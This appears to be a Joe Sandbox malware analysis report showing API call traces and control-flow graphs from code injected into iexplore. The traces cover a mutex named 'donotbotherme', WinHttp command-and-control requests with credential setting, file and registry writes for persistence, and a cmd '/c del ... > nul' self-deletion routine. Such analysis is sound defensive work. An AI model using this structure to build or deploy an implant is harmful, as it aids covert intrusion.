157->127 163 513a20 158->163 171 51394d-513954 158->171 159->163 161->73 163->114 167 513a26-513a2d 163->167 168 513897-5138a5 164->168 169 51385c-513870 call 517fbe 164->169 173 513a3a-513a3d 167->173 174 513a2f-513a35 call 516653 167->174 168->153 169->140 171->159 173->74 174->173
    APIs
    • __EH_prolog3_GS.LIBCMT ref: 005135DE
    • CreateMutexA.KERNELBASE(00000000,00000001,donotbotherme,000002A8,00516509,?,?), ref: 00513607
    • GetLastError.KERNEL32 ref: 0051360F
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 005148A0: memset.MSVCRT ref: 005148B7
      • Part of subcall function 005148A0: SHGetSpecialFolderPathA.SHELL32(00000000,-0000D007,0000001C,00000000), ref: 005148C4
      • Part of subcall function 005148A0: CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 005148E1
      • Part of subcall function 005148A0: CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 005148F5
      • Part of subcall function 005148A0: CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 00514909
      • Part of subcall function 005148A0: ___swprintf_l.LIBCMT ref: 0051493E
      • Part of subcall function 0051494C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0051496C
      • Part of subcall function 0051494C: ReadFile.KERNEL32(00000000,?,00000269,?,00000000), ref: 00514993
      • Part of subcall function 0051494C: CloseHandle.KERNEL32(00000000), ref: 0051499A
      • Part of subcall function 0051494C: ??2@YAPAXI@Z.MSVCRT ref: 005149A7
      • Part of subcall function 0051494C: ??3@YAXPAX@Z.MSVCRT ref: 005149CD
      • Part of subcall function 005149DD: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00514A11
      • Part of subcall function 005149DD: memcpy.MSVCRT ref: 00514A35
      • Part of subcall function 005149DD: ??2@YAPAXI@Z.MSVCRT ref: 00514A3C
      • Part of subcall function 005149DD: ??3@YAXPAX@Z.MSVCRT ref: 00514A62
      • Part of subcall function 005149DD: WriteFile.KERNEL32(?,?,00000269,?,00000000), ref: 00514A7D
      • Part of subcall function 005149DD: CloseHandle.KERNEL32(?), ref: 00514A86
      • Part of subcall function 00514B82: ??2@YAPAXI@Z.MSVCRT ref: 00514B9C
      • Part of subcall function 00514B82: GetAdaptersInfo.IPHLPAPI(00000000,6Q), ref: 00514BAC
      • Part of subcall function 00514B82: ??3@YAXPAX@Z.MSVCRT ref: 00514BB7
      • Part of subcall function 00514B82: ??2@YAPAXI@Z.MSVCRT ref: 00514BC0
      • Part of subcall function 00514B82: GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00514BD0
      • Part of subcall function 00514B82: ??3@YAXPAX@Z.MSVCRT ref: 00514C60
    • inet_addr.WS2_32(?), ref: 005136FD
      • Part of subcall function 00514C71: memset.MSVCRT ref: 00514C9D
      • Part of subcall function 00514C71: WSAStartup.WS2_32(00000002,?), ref: 00514CAE
      • Part of subcall function 00514C71: gethostname.WS2_32(00000000,00000100), ref: 00514CC3
      • Part of subcall function 00514C71: gethostbyname.WS2_32(00000000), ref: 00514CD3
      • Part of subcall function 00514C71: inet_ntoa.WS2_32(?), ref: 00514CE3
      • Part of subcall function 00514C71: WSACleanup.WS2_32 ref: 00514CF2
    • GetLocalTime.KERNEL32(?,?), ref: 00513780
    • GetLocalTime.KERNEL32(?), ref: 005137B5
    • WaitForSingleObject.KERNEL32(?,000927C0), ref: 005137C2
    • GetLocalTime.KERNEL32(?), ref: 005137DD
    • WaitForSingleObject.KERNEL32(?,000927C0), ref: 005137EA
    • time.MSVCRT ref: 005138C0
    • srand.MSVCRT ref: 005138C7
    • rand.MSVCRT ref: 005138D9
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0051393E
    • time.MSVCRT ref: 005139B0
    • srand.MSVCRT ref: 005139B7
    • rand.MSVCRT ref: 005139C3
    • WaitForSingleObject.KERNEL32(?,?), ref: 00513A17
      • Part of subcall function 00516653: free.MSVCRT(00000000,00513A3A), ref: 0051665E
      • Part of subcall function 00517C7C: GlobalMemoryStatusEx.KERNELBASE(00000000,?,00000000,?), ref: 00517CCD
    • CloseHandle.KERNEL32(00000000), ref: 00513A61
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F120F, Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 168file

    Control-flow Graph

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,{2CB55487-9F5C-48D4-B6A1-2521E247A169}), ref: 004F1238
    • GetLastError.KERNEL32 ref: 004F1249
    • memset.MSVCRT ref: 004F126A
    • GetModuleFileNameW.KERNEL32(?,00000104), ref: 004F1282
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F1298
    • GetFileSize.KERNEL32(00000000,00000000), ref: 004F12AE
    • ??2@YAPAXI@Z.MSVCRT ref: 004F12B9
    • memset.MSVCRT ref: 004F12CA
    • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 004F12DE
    • CloseHandle.KERNEL32(00000000), ref: 004F12E5
      • Part of subcall function 004F1000: memset.MSVCRT ref: 004F102B
      • Part of subcall function 004F1000: GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 004F1040
      • Part of subcall function 004F1000: memset.MSVCRT ref: 004F109D
      • Part of subcall function 004F1000: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 004F10B0
      • Part of subcall function 004F1000: GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 004F10D4
      • Part of subcall function 004F1000: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020006,?), ref: 004F1130
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 004F12FE
      • Part of subcall function 004F342F: _errno.MSVCRT ref: 004F3447
      • Part of subcall function 004F342F: _errno.MSVCRT ref: 004F349E
    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 004F131B
    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 004F1334
    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 004F134D
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F1371
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 004F138E
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004F13A8
    • CloseHandle.KERNEL32(?), ref: 004F13B1
    • WaitForSingleObject.KERNEL32(?,00003A98), ref: 004F13BF
    • ??3@YAXPAX@Z.MSVCRT ref: 004F13D3
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 005130ED, Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 150

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 261 5130ed-513126 call 512ccf 264 513128 261->264 265 51313a-513141 261->265 268 51312d call 517fbe 264->268 266 51317f-513190 WinHttpSendRequest 265->266 267 513143-513144 265->267 272 513192-513199 GetLastError 266->272 273 513163-51316f WinHttpReceiveResponse 266->273 269 51314d-513158 call 51327c 267->269 270 513146-51314b 267->270 277 513132 268->277 279 51315d-51315f 269->279 270->268 278 51319e-5131a4 call 517fbe 272->278 274 5131a6-5131db WinHttpQueryHeaders GetLastError 273->274 275 513171-51317d GetLastError 273->275 281 513204 274->281 282 5131dd-513200 WinHttpQueryHeaders _wtoi 274->282 275->278 280 513133-513135 277->280 278->277 279->280 284 513161 279->284 289 51326b-513279 call 51a460 280->289 285 513207-513213 call 517fbe 281->285 287 513202 282->287 288 513214-51321a 282->288 284->273 285->288 287->285 290 51321c-513222 288->290 291 513224-51325a WinHttpQueryAuthSchemes WinHttpSetCredentials 288->291 290->291 294 513260-513268 290->294 291->294 294->289
    APIs
      • Part of subcall function 00512CCF: memset.MSVCRT ref: 00512D12
      • Part of subcall function 00512CCF: memset.MSVCRT ref: 00512D77
      • Part of subcall function 00512CCF: memset.MSVCRT ref: 00512DA7
      • Part of subcall function 00512CCF: ??2@YAPAXI@Z.MSVCRT ref: 00512DEA
      • Part of subcall function 00512CCF: ??2@YAPAXI@Z.MSVCRT ref: 00512E1B
      • Part of subcall function 00512CCF: ??2@YAPAXI@Z.MSVCRT ref: 00512E4C
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 00512F06
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 00512F12
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 00512F1E
      • Part of subcall function 00512CCF: ??2@YAPAXI@Z.MSVCRT ref: 00512F33
      • Part of subcall function 00512CCF: ??2@YAPAXI@Z.MSVCRT ref: 00512F4C
      • Part of subcall function 00512CCF: rand.MSVCRT ref: 00512F5A
      • Part of subcall function 00512CCF: __swprintf_c_l.LIBCMT ref: 00512F7B
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 00512FB1
      • Part of subcall function 00512CCF: rand.MSVCRT ref: 00512FBB
      • Part of subcall function 00512CCF: __swprintf_c_l.LIBCMT ref: 00512FD7
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 0051300D
      • Part of subcall function 00512CCF: rand.MSVCRT ref: 00513017
      • Part of subcall function 00512CCF: __swprintf_c_l.LIBCMT ref: 00513033
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 00513065
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 0051307D
      • Part of subcall function 00512CCF: WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000002,A0000000), ref: 005130BB
      • Part of subcall function 00512CCF: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 005130C5
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 005130DB
      • Part of subcall function 0051327C: memset.MSVCRT ref: 005132A2
      • Part of subcall function 0051327C: __swprintf_c_l.LIBCMT ref: 005132B8
      • Part of subcall function 0051327C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,A0000000,?,?,?,?,?,?,?,00000000), ref: 005132E1
      • Part of subcall function 0051327C: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 005132EB
      • Part of subcall function 0051327C: WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0051330B
      • Part of subcall function 0051327C: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00513315
      • Part of subcall function 0051327C: WinHttpWriteData.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00513331
      • Part of subcall function 0051327C: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0051333B
    • WinHttpReceiveResponse.WINHTTP(?,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513167
    • GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513171
    • WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000,000004A9,000003E9,0000D10B,00000000,00000000,000003E9,?,?), ref: 00513188
    • GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513192
    • WinHttpQueryHeaders.WINHTTP(?,00000013,00000000,00000000,00000000,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131D0
    • GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131D2
    • WinHttpQueryHeaders.WINHTTP(?,00000013,00000000,00000000,00000000,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131EC
    • _wtoi.MSVCRT ref: 005131F2
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpQueryAuthSchemes.WINHTTP(?,?,?,:EQ,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 0051323C
    • WinHttpSetCredentials.WINHTTP(?,:EQ,?,00000729,0000075B,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 0051325A
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005141F0, Relevance: 26.5, APIs: 4, Strings: 11, Instructions: 214

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 297 5141f0-51421e 298 514227 297->298 299 514220-514225 297->299 300 51422c-51425e call 51a79d call 51a729 call 518fe7 298->300 299->300 307 5142b2-5142b8 300->307 308 514260-514267 call 5144a4 300->308 310 514334-514342 call 5144a4 307->310 311 5142ba-5142c8 call 5144a4 307->311 312 51426c-51426e 308->312 323 5142d7-5142e6 ??2@YAPAXI@Z 310->323 324 514344-514349 310->324 320 5142d1 311->320 321 5142ca-5142cf 311->321 315 514287-51429c call 5149dd 312->315 316 514270 312->316 315->323 330 51429e-5142b0 GetLastError call 517fbe 315->330 322 514275-51427a call 517fbe 316->322 320->323 321->322 332 514280-514282 322->332 325 5142e8-5142fd call 5140aa 323->325 324->322 335 514438-51443a 325->335 336 514303-51430f 325->336 330->332 334 514452-514460 call 51a460 332->334 340 51444a-514450 ??3@YAXPAX@Z 335->340 338 51431e-514327 336->338 339 514311-514317 call 517fbe 336->339 344 51432d 338->344 345 514407-51440e call 517fbe 338->345 357 51431c-51431d 339->357 340->334 344->310 344->345 347 514447-514449 344->347 348 5143b4-5143c4 call 515e8d 344->348 349 51434e-514359 call 514d05 344->349 350 5143c6-5143d7 call 515f93 344->350 351 514382-51439d call 5159af call 5144a4 344->351 352 51439f-5143b2 call 515cdd 344->352 353 51443c-514445 ??3@YAXPAX@Z 344->353 354 5143ed-514405 call 516178 call 516239 344->354 355 514374-514380 call 515258 344->355 356 514365-514372 call 514f64 344->356 362 514413 345->362 347->340 373 514414-514419 348->373 370 51435e-514360 349->370 350->373 380 5143d9-5143eb call 517fbe 350->380 351->370 352->373 353->334 354->373 355->370 356->370 357->338 362->373 370->373 378 514422 373->378 379 51441b-514420 373->379 384 514427-514430 call 517fbe 378->384 379->384 380->362 384->325 388 514436 384->388 388->340
    APIs
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
      • Part of subcall function 00518FE7: time.MSVCRT ref: 0051900D
      • Part of subcall function 00518FE7: srand.MSVCRT ref: 00519014
      • Part of subcall function 00518FE7: ??2@YAPAXI@Z.MSVCRT ref: 0051901C
      • Part of subcall function 00518FE7: rand.MSVCRT ref: 00519040
      • Part of subcall function 00518FE7: ??3@YAXPAX@Z.MSVCRT ref: 005190BC
    • GetLastError.KERNEL32(?,00000000,000003E9,?,?,?,?,?,00000000), ref: 0051429E
    • ??2@YAPAXI@Z.MSVCRT ref: 005142DC
      • Part of subcall function 005140AA: WinHttpQueryDataAvailable.WINHTTP(?,00000000,?,00000000,?,?), ref: 005140C4
      • Part of subcall function 005140AA: GetLastError.KERNEL32 ref: 005140CE
      • Part of subcall function 005140AA: ??2@YAPAXI@Z.MSVCRT ref: 00514130
      • Part of subcall function 005140AA: ??2@YAPAXI@Z.MSVCRT ref: 00514156
      • Part of subcall function 005140AA: ??3@YAXPAX@Z.MSVCRT ref: 00514181
      • Part of subcall function 005140AA: ??3@YAXPAX@Z.MSVCRT ref: 00514188
      • Part of subcall function 005140AA: ??3@YAXPAX@Z.MSVCRT ref: 0051419B
      • Part of subcall function 005140AA: ??3@YAXPAX@Z.MSVCRT ref: 005141C7
      • Part of subcall function 005140AA: ??3@YAXPAX@Z.MSVCRT ref: 005141E2
      • Part of subcall function 005144A4: ??2@YAPAXI@Z.MSVCRT ref: 005144D4
      • Part of subcall function 005144A4: memset.MSVCRT ref: 005144E0
      • Part of subcall function 005144A4: memcpy.MSVCRT ref: 005144F8
      • Part of subcall function 005144A4: ??3@YAXPAX@Z.MSVCRT ref: 00514516
      • Part of subcall function 005144A4: ??3@YAXPAX@Z.MSVCRT ref: 00514520
      • Part of subcall function 00514D05: memset.MSVCRT ref: 00514D3A
      • Part of subcall function 00514D05: GetLastError.KERNEL32(00000001,?,00000000), ref: 00514D50
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514DBE
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514E2D
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514E87
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514ED7
      • Part of subcall function 00514F64: memset.MSVCRT ref: 00515004
      • Part of subcall function 00514F64: memset.MSVCRT ref: 00515062
      • Part of subcall function 00514F64: strstr.MSVCRT ref: 005150A5
      • Part of subcall function 00514F64: GetLastError.KERNEL32(00000000,?,00000000), ref: 00515220
      • Part of subcall function 00515258: ??2@YAPAXI@Z.MSVCRT ref: 00515288
      • Part of subcall function 00515258: memset.MSVCRT ref: 00515295
      • Part of subcall function 00515258: ??2@YAPAXI@Z.MSVCRT ref: 005152A2
      • Part of subcall function 00515258: memset.MSVCRT ref: 005152B5
      • Part of subcall function 00515258: memcpy.MSVCRT ref: 005152C5
      • Part of subcall function 00515258: ??2@YAPAXI@Z.MSVCRT ref: 005152DE
      • Part of subcall function 00515258: memset.MSVCRT ref: 005152ED
      • Part of subcall function 00515258: strstr.MSVCRT ref: 0051532E
      • Part of subcall function 00515258: ??3@YAXPAX@Z.MSVCRT ref: 00515453
      • Part of subcall function 00515258: ??3@YAXPAX@Z.MSVCRT ref: 0051545C
      • Part of subcall function 00515258: ??3@YAXPAX@Z.MSVCRT ref: 00515463
      • Part of subcall function 005159AF: memset.MSVCRT ref: 005159E7
      • Part of subcall function 005159AF: ??2@YAPAXI@Z.MSVCRT ref: 00515A3A
      • Part of subcall function 005159AF: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00515A60
      • Part of subcall function 005159AF: GetLastError.KERNEL32 ref: 00515A71
      • Part of subcall function 005159AF: GetFileSize.KERNEL32(00000000,00000000), ref: 00515A93
      • Part of subcall function 005159AF: GetLastError.KERNEL32 ref: 00515AA4
      • Part of subcall function 005159AF: memset.MSVCRT ref: 00515AB6
      • Part of subcall function 005159AF: memcpy.MSVCRT ref: 00515AD1
      • Part of subcall function 005159AF: GetLastError.KERNEL32(00000000,?,000003F0,?,?,?,?,?,?,?,?,00000000,000003EB), ref: 00515B02
      • Part of subcall function 005159AF: GetTickCount.KERNEL32(00000000,?,000003F0,?,?,?,?,?,?,?,?,00000000,000003EB), ref: 00515B12
      • Part of subcall function 005159AF: srand.MSVCRT ref: 00515B19
      • Part of subcall function 005159AF: memset.MSVCRT ref: 00515B23
      • Part of subcall function 005159AF: rand.MSVCRT ref: 00515B32
      • Part of subcall function 005159AF: ReadFile.KERNEL32(?,0000000C,0000C60B,00000000,00000000), ref: 00515B5B
      • Part of subcall function 005159AF: GetLastError.KERNEL32 ref: 00515B65
      • Part of subcall function 005159AF: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00515BBC
      • Part of subcall function 005159AF: GetLastError.KERNEL32(00000000,-0000000C,000003F1,?), ref: 00515BE7
      • Part of subcall function 005159AF: ??3@YAXPAX@Z.MSVCRT ref: 00515C28
      • Part of subcall function 00515CDD: memset.MSVCRT ref: 00515CFB
      • Part of subcall function 00515CDD: ??2@YAPAXI@Z.MSVCRT ref: 00515D57
      • Part of subcall function 00515CDD: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000000,00000000), ref: 00515D82
      • Part of subcall function 00515CDD: CloseHandle.KERNEL32(00000000), ref: 00515D8E
      • Part of subcall function 00515CDD: memcpy.MSVCRT ref: 00515DA4
      • Part of subcall function 00515CDD: GetLastError.KERNEL32(?,?,?,?,00000000,000003EB,?,?,?,?,?,00000000), ref: 00515DD1
      • Part of subcall function 00515CDD: ??3@YAXPAX@Z.MSVCRT ref: 00515E78
      • Part of subcall function 00515E8D: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 00515EBD
      • Part of subcall function 00515E8D: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 00515ED0
      • Part of subcall function 00515E8D: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 00515EE6
      • Part of subcall function 00515E8D: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00515F1C
      • Part of subcall function 00515E8D: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00515F2E
      • Part of subcall function 00515E8D: GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00515F38
      • Part of subcall function 00515E8D: GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00515F50
      • Part of subcall function 00515E8D: CloseHandle.KERNEL32(000000FF), ref: 00515F6D
      • Part of subcall function 00515F93: ??2@YAPAXI@Z.MSVCRT ref: 00515FA9
      • Part of subcall function 00515F93: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00515FC9
      • Part of subcall function 00515F93: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00515F8B), ref: 00515FE0
      • Part of subcall function 00515F93: CloseHandle.KERNEL32(00515F8B), ref: 00515FEC
      • Part of subcall function 00515F93: memcpy.MSVCRT ref: 0051603E
      • Part of subcall function 00515F93: memcpy.MSVCRT ref: 00516052
      • Part of subcall function 00515F93: ??3@YAXPAX@Z.MSVCRT ref: 00516087
      • Part of subcall function 00516178: DeleteFileA.KERNEL32(?,00520170,0000002C,005143F8,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,000003EB,?,00000000), ref: 005161AD
      • Part of subcall function 00516178: GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 005161C0
      • Part of subcall function 00516239: GetModuleFileNameW.KERNEL32(?,?,00000104,?), ref: 00516269
      • Part of subcall function 00516239: GetShortPathNameW.KERNEL32(?,?,00000104), ref: 00516280
      • Part of subcall function 00516239: GetEnvironmentVariableW.KERNEL32(COMSPEC,?,00000104), ref: 00516298
      • Part of subcall function 00516239: wcsstr.MSVCRT ref: 005162B3
      • Part of subcall function 00516239: memset.MSVCRT ref: 005162D4
      • Part of subcall function 00516239: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 005162E7
      • Part of subcall function 00516239: DeleteFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00516309
      • Part of subcall function 00516239: lstrcpyW.KERNEL32(?,/c del ), ref: 0051631B
      • Part of subcall function 00516239: lstrcatW.KERNEL32(?,?), ref: 00516335
      • Part of subcall function 00516239: lstrcatW.KERNEL32(?, > nul), ref: 00516343
      • Part of subcall function 00516239: ShellExecuteExW.SHELL32(?), ref: 00516375
      • Part of subcall function 00516239: SetPriorityClass.KERNEL32(?,00000040), ref: 00516389
      • Part of subcall function 00516239: GetCurrentProcess.KERNEL32(00000100), ref: 00516390
      • Part of subcall function 00516239: SetPriorityClass.KERNEL32(00000000), ref: 00516397
      • Part of subcall function 00516239: GetCurrentThread.KERNEL32(0000000F), ref: 0051639B
      • Part of subcall function 00516239: SetThreadPriority.KERNEL32(00000000), ref: 005163A2
      • Part of subcall function 00516239: SHChangeNotify.SHELL32(00000004,00000005,?,00000000), ref: 005163B4
      • Part of subcall function 00516239: ExitProcess.KERNEL32 ref: 005163BB
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • ??3@YAXPAX@Z.MSVCRT ref: 0051443D
    • ??3@YAXPAX@Z.MSVCRT ref: 0051444B
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 005149DD: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00514A11
      • Part of subcall function 005149DD: memcpy.MSVCRT ref: 00514A35
      • Part of subcall function 005149DD: ??2@YAPAXI@Z.MSVCRT ref: 00514A3C
      • Part of subcall function 005149DD: ??3@YAXPAX@Z.MSVCRT ref: 00514A62
      • Part of subcall function 005149DD: WriteFile.KERNEL32(?,?,00000269,?,00000000), ref: 00514A7D
      • Part of subcall function 005149DD: CloseHandle.KERNEL32(?), ref: 00514A86
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F1000, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 170registry

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 389 4f1000-4f1138 memset GetSystemDirectoryA call 4f3337 * 3 memset SHGetSpecialFolderPathA call 4f3337 GetShortPathNameA call 4f3337 * 2 RegOpenKeyExA 402 4f1200-4f120e call 4f32a0 389->402 403 4f113e-4f1192 memset RegQueryValueExA 389->403 404 4f11c7-4f11cd 403->404 405 4f1194-4f119a 403->405 409 4f11d0-4f11d5 404->409 407 4f11a0-4f11a4 405->407 410 4f11be-4f11c0 407->410 411 4f11a6-4f11a8 407->411 409->409 412 4f11d7-4f11ee RegSetValueExA 409->412 414 4f11c3-4f11c5 410->414 415 4f11aa-4f11b0 411->415 416 4f11ba-4f11bc 411->416 413 4f11f4-4f11fa RegCloseKey 412->413 413->402 414->404 414->413 415->410 417 4f11b2-4f11b8 415->417 416->414 417->407 417->416
    APIs
    • memset.MSVCRT ref: 004F102B
